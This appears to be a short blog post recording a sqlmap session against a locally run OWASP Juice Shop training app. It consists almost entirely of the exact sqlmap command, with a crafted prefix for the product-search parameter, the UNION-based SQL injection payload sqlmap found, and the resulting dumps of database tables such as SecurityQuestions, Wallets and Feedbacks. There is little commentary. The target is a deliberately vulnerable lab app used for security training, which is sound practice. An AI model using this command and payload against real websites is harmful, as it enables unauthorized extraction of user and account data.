Monday, January 24, 2022

sqlmap hack owasp juice shop

──(kali㉿kali)-[~/Downloads/sqlmap/sqlmap-dev]
└─$ python sqlmap.py -u 'http://localhost:3000/rest/products/search?q=test' -p 'q' --dbms="sqlite" --technique U --prefix "')) " --level 5 --risk 3 --dump-all --no-cast --no-escape --flush
        ___
       __H__                                                                        
 ___ ___[.]_____ ___ ___  {1.6.1.7#dev}                                             
|_ -| . [)]     | .'| . |                                                           
|___|_  ["]_|_|_|__,|  _|                                                           
      |_|V...       |_|   https://sqlmap.org                                        

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:07:08 /2022-01-24/

[23:07:08] [INFO] flushing session file
[23:07:08] [INFO] testing connection to the target URL
[23:07:08] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:07:08] [WARNING] heuristic (basic) test shows that GET parameter 'q' might not be injectable
[23:07:08] [INFO] testing for SQL injection on GET parameter 'q'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] n
[23:07:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:07:13] [INFO] target URL appears to be UNION injectable with 9 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[23:07:27] [INFO] GET parameter 'q' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
[23:07:27] [INFO] checking if the injection point on GET parameter 'q' is a false positive
[23:07:28] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'q' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 80 HTTP(s) requests:
---
Parameter: q (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: q=test'))  UNION ALL SELECT 46,46,46,46,46,'qxxvq'||'fcxvWpdSHxEBGIzlgpIxXNqeYluBvSKJcIwrEBpm'||'qzvvq',46,46,46-- syas
---
[23:07:35] [INFO] testing SQLite
[23:07:35] [INFO] confirming SQLite
[23:07:35] [INFO] actively fingerprinting SQLite
[23:07:35] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[23:07:35] [INFO] sqlmap will dump entries of all tables from all databases now
[23:07:35] [INFO] fetching tables for database: 'SQLite_masterdb'
[23:07:35] [INFO] fetching columns for table 'SecurityQuestions' 
[23:07:35] [INFO] fetching entries for table 'SecurityQuestions'
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.189 +00:00','1','Your eld...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.189 +00:00','2','Mother's...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.189 +00:00','3','Mother's...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','4','Father's...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','5','Maternal...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','6','Paternal...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','7','Name of ...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','8','Last nam...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','9','Your ZIP...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','10','Company...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','11','Your fa...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','12','Your fa...
[23:07:36] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','13','Number ...
[23:07:36] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','14','What's ...
Database: <current>                                                                
Table: SecurityQuestions
[14 entries]
+----+-----+-----------------------------------------------------------------------+--------------------------------+--------------------------------+
| id | 255 | question                                                              | updatedAt                      | createdAt                      |
+----+-----+-----------------------------------------------------------------------+--------------------------------+--------------------------------+
| 1  | 255 | Your eldest siblings middle name?                                     | 2022-01-25 02:53:33.189 +00:00 | 2022-01-25 02:53:33.189 +00:00 |
| 2  | 255 | Mother's maiden name?                                                 | 2022-01-25 02:53:33.189 +00:00 | 2022-01-25 02:53:33.189 +00:00 |
| 3  | 255 | Mother's birth date? (MM/DD/YY)                                       | 2022-01-25 02:53:33.189 +00:00 | 2022-01-25 02:53:33.189 +00:00 |
| 4  | 255 | Father's birth date? (MM/DD/YY)                                       | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 5  | 255 | Maternal grandmother's first name?                                    | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 6  | 255 | Paternal grandmother's first name?                                    | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 7  | 255 | Name of your favorite pet?                                            | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 8  | 255 | Last name of dentist when you were a teenager? (Do not include 'Dr.') | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 9  | 255 | Your ZIP/postal code when you were a teenager?                        | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 10 | 255 | Company you first work for as an adult?                               | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 11 | 255 | Your favorite book?                                                   | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 12 | 255 | Your favorite movie?                                                  | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 13 | 255 | Number of one of your customer or ID cards?                           | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 14 | 255 | What's your favorite place to go hiking?                              | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
+----+-----+-----------------------------------------------------------------------+--------------------------------+--------------------------------+

[23:07:36] [INFO] table 'SQLite_masterdb.SecurityQuestions' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/SecurityQuestions.csv'                                                                                 
[23:07:36] [INFO] fetching columns for table 'ImageCaptchas' 
[23:07:36] [INFO] fetching entries for table 'ImageCaptchas'
[23:07:36] [WARNING] unable to retrieve the entries for table 'ImageCaptchas' in database 'SQLite_masterdb'
[23:07:36] [INFO] fetching columns for table 'Addresses' 
[23:07:36] [INFO] fetching entries for table 'Addresses'
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] unable to retrieve the entries for table 'Addresses' in database 'SQLite_masterdb'
[23:07:36] [INFO] fetching columns for table 'Recycles' 
[23:07:36] [INFO] fetching entries for table 'Recycles'
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] unable to retrieve the entries for table 'Recycles' in database 'SQLite_masterdb'
[23:07:36] [INFO] fetching columns for table 'Wallets' 
[23:07:36] [INFO] fetching entries for table 'Wallets'
[23:07:36] [INFO] retrieved: '1','0','2022-01-25 02:53:33.952 +00:00','1','2022-0...
[23:07:36] [INFO] retrieved: '2','100','2022-01-25 02:53:33.952 +00:00','2','2022...
[23:07:36] [INFO] retrieved: '3','0','2022-01-25 02:53:33.952 +00:00','3','2022-0...
[23:07:36] [INFO] retrieved: '4','0','2022-01-25 02:53:33.952 +00:00','4','2022-0...
[23:07:36] [INFO] retrieved: '5','0','2022-01-25 02:53:33.952 +00:00','5','2022-0...
[23:07:36] [INFO] retrieved: '6','0','2022-01-25 02:53:33.952 +00:00','6','2022-0...
[23:07:36] [INFO] retrieved: '7','100','2022-01-25 02:53:33.952 +00:00','7','2022...
[23:07:36] [INFO] retrieved: '8','0','2022-01-25 02:53:33.952 +00:00','8','2022-0...
[23:07:37] [INFO] retrieved: '9','0','2022-01-25 02:53:33.952 +00:00','9','2022-0...
[23:07:37] [INFO] retrieved: '10','0','2022-01-25 02:53:33.952 +00:00','10','2022...
[23:07:37] [INFO] retrieved: '11','0','2022-01-25 02:53:33.952 +00:00','11','2022...
[23:07:37] [INFO] retrieved: '12','0','2022-01-25 02:53:33.952 +00:00','12','2022...
[23:07:37] [INFO] retrieved: '13','0','2022-01-25 02:53:33.952 +00:00','13','2022...
[23:07:37] [INFO] retrieved: '14','0','2022-01-25 02:53:33.953 +00:00','14','2022...
[23:07:37] [INFO] retrieved: '15','0','2022-01-25 02:53:33.953 +00:00','15','2022...
[23:07:37] [INFO] retrieved: '16','100','2022-01-25 02:53:33.953 +00:00','16','20...
[23:07:37] [INFO] retrieved: '17','200','2022-01-25 02:53:33.953 +00:00','17','20...
[23:07:37] [INFO] retrieved: '18','0','2022-01-25 02:53:33.953 +00:00','18','2022...
[23:07:37] [INFO] retrieved: '19','0','2022-01-25 02:53:33.953 +00:00','19','2022...
[23:07:37] [INFO] retrieved: '20','0','2022-01-25 02:53:33.953 +00:00','20','2022...
Database: <current>                                                                
Table: Wallets
[20 entries]
+----+--------+---------+--------------------------------+--------------------------------+
| id | UserId | balance | updatedAt                      | createdAt                      |
+----+--------+---------+--------------------------------+--------------------------------+
| 1  | 1      | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 2  | 2      | 100     | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 3  | 3      | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 4  | 4      | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 5  | 5      | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 6  | 6      | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 7  | 7      | 100     | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 8  | 8      | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 9  | 9      | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 10 | 10     | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 11 | 11     | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 12 | 12     | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 13 | 13     | 0       | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 14 | 14     | 0       | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 15 | 15     | 0       | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 16 | 16     | 100     | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 17 | 17     | 200     | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 18 | 18     | 0       | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 19 | 19     | 0       | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 20 | 20     | 0       | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
+----+--------+---------+--------------------------------+--------------------------------+

[23:07:37] [INFO] table 'SQLite_masterdb.Wallets' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/Wallets.csv'                 
[23:07:37] [INFO] fetching columns for table 'Memories' 
[23:07:37] [INFO] fetching entries for table 'Memories'
[23:07:37] [WARNING] unable to retrieve the entries for table 'Memories' in database 'SQLite_masterdb'
[23:07:37] [INFO] fetching columns for table 'sqlite_sequence' 
[23:07:37] [INFO] fetching entries for table 'sqlite_sequence'
Database: <current>
Table: sqlite_sequence
[17 entries]
+-----+-------------------+
| seq | name              |
+-----+-------------------+
| 14  | SecurityQuestions |
| 20  | Users             |
| 19  | SecurityAnswers   |
| 6   | Addresses         |
| 6   | Cards             |
| 8   | Feedbacks         |
| 100 | Challenges        |
| 44  | Products          |
| 5   | Baskets           |
| 8   | BasketItems       |
| 1   | Complaints        |
| 9   | Recycles          |
| 44  | Quantities        |
| 20  | Wallets           |
| 3   | Deliveries        |
| 5   | Memories          |
| 2   | Captchas          |
+-----+-------------------+

[23:07:37] [INFO] table 'SQLite_masterdb.sqlite_sequence' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/sqlite_sequence.csv' 
[23:07:37] [INFO] fetching columns for table 'Baskets' 
[23:07:37] [INFO] fetching entries for table 'Baskets'
[23:07:37] [WARNING] unable to retrieve the entries for table 'Baskets' in database 'SQLite_masterdb'
[23:07:37] [INFO] fetching columns for table 'PrivacyRequests' 
[23:07:37] [INFO] fetching entries for table 'PrivacyRequests'
[23:07:37] [WARNING] unable to retrieve the entries for table 'PrivacyRequests' in database 'SQLite_masterdb'
[23:07:37] [INFO] fetching columns for table 'Challenges' 
[23:07:37] [INFO] fetching entries for table 'Challenges'
[23:07:40] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:40] [WARNING] unable to retrieve the entries for table 'Challenges' in database 'SQLite_masterdb'
[23:07:40] [INFO] fetching columns for table 'Complaints' 
[23:07:40] [INFO] fetching entries for table 'Complaints'
[23:07:40] [WARNING] unable to retrieve the entries for table 'Complaints' in database 'SQLite_masterdb'
[23:07:40] [INFO] fetching columns for table 'Quantities' 
[23:07:40] [INFO] fetching entries for table 'Quantities'
Database: <current>                                                                
Table: Quantities
[12 entries]
+----+-----------+----------+--------------------------------+--------------------------------+--------------+
| id | ProductId | quantity | updatedAt                      | createdAt                      | limitPerUser |
+----+-----------+----------+--------------------------------+--------------------------------+--------------+
| 1  | 1         | 69       | 2022-01-25 02:53:33.858 +00:00 | 2022-01-25 02:53:33.858 +00:00 | 5            |
| 5  | 5         | 71       | 2022-01-25 02:53:33.858 +00:00 | 2022-01-25 02:53:33.858 +00:00 | 5            |
| 7  | 7         | 48       | 2022-01-25 02:53:33.859 +00:00 | 2022-01-25 02:53:33.859 +00:00 | 5            |
| 20 | 20        | 5        | 2022-01-25 02:53:33.860 +00:00 | 2022-01-25 02:53:33.860 +00:00 | 5            |
| 24 | 24        | 35       | 2022-01-25 02:53:33.860 +00:00 | 2022-01-25 02:53:33.860 +00:00 | 5            |
| 33 | 33        | 3        | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1            |
| 38 | 38        | 0        | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1            |
| 39 | 39        | 51       | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 5            |
| 40 | 40        | 2        | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1            |
| 41 | 41        | 1        | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1            |
| 43 | 43        | 3        | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1            |
| 44 | 44        | 38       | 2022-01-25 02:53:33.861 +00:00 | 2022-01-25 02:53:33.861 +00:00 | 1            |
+----+-----------+----------+--------------------------------+--------------------------------+--------------+

[23:07:41] [INFO] table 'SQLite_masterdb.Quantities' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/Quantities.csv'           
[23:07:41] [INFO] fetching columns for table 'Products' 
[23:07:41] [INFO] fetching entries for table 'Products'
[23:07:42] [WARNING] unable to retrieve the entries for table 'Products' in database 'SQLite_masterdb'
[23:07:42] [INFO] fetching columns for table 'Deliveries' 
[23:07:42] [INFO] fetching entries for table 'Deliveries'
[23:07:42] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:42] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:42] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:42] [WARNING] unable to retrieve the entries for table 'Deliveries' in database 'SQLite_masterdb'
[23:07:42] [INFO] fetching columns for table 'Captchas' 
[23:07:42] [INFO] fetching entries for table 'Captchas'
[23:07:42] [WARNING] unable to retrieve the entries for table 'Captchas' in database 'SQLite_masterdb'
[23:07:42] [INFO] fetching columns for table 'Cards' 
[23:07:42] [INFO] fetching entries for table 'Cards'
[23:07:43] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:43] [WARNING] unable to retrieve the entries for table 'Cards' in database 'SQLite_masterdb'                                                                     
[23:07:43] [INFO] fetching columns for table 'BasketItems' 
[23:07:43] [INFO] fetching entries for table 'BasketItems'
[23:07:43] [WARNING] unable to retrieve the entries for table 'BasketItems' in database 'SQLite_masterdb'
[23:07:43] [INFO] fetching columns for table 'SecurityAnswers' 
[23:07:43] [INFO] fetching entries for table 'SecurityAnswers'
[23:07:43] [WARNING] unable to retrieve the entries for table 'SecurityAnswers' in database 'SQLite_masterdb'
[23:07:43] [INFO] fetching columns for table 'Feedbacks' 
[23:07:43] [INFO] fetching entries for table 'Feedbacks'
Database: <current>                                                                
Table: Feedbacks
[3 entries]
+----+--------+-----+--------+----------------------------------------------------------------------------------+--------------------------------+--------------------------------+
| id | UserId | 255 | rating | comment                                                                          | updatedAt                      | createdAt                      |
+----+--------+-----+--------+----------------------------------------------------------------------------------+--------------------------------+--------------------------------+
| 1  | 1      | 255 | 5      | I love this shop! Best products in town! Highly recommended! (***in@juice-sh.op) | 2022-01-25 02:53:33.307 +00:00 | 2022-01-25 02:53:33.307 +00:00 |
| 2  | 2      | 255 | 4      | Great shop! Awesome service! (***@juice-sh.op)                                   | 2022-01-25 02:53:33.310 +00:00 | 2022-01-25 02:53:33.310 +00:00 |
| 3  | 3      | 255 | 1      | Nothing useful available here! (***der@juice-sh.op)                              | 2022-01-25 02:53:33.312 +00:00 | 2022-01-25 02:53:33.312 +00:00 |
+----+--------+-----+--------+----------------------------------------------------------------------------------+--------------------------------+--------------------------------+

[23:07:44] [INFO] table 'SQLite_masterdb.Feedbacks' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/Feedbacks.csv'             
[23:07:44] [INFO] fetching columns for table 'Users' 
[23:07:44] [INFO] fetching entries for table 'Users'
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:44] [WARNING] unable to retrieve the entries for table 'Users' in database 'SQLite_masterdb'                                                                     
[23:07:44] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 359 times
[23:07:44] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/localhost'                                                             

[*] ending @ 23:07:44 /2022-01-24/

reference:

No comments:

Post a Comment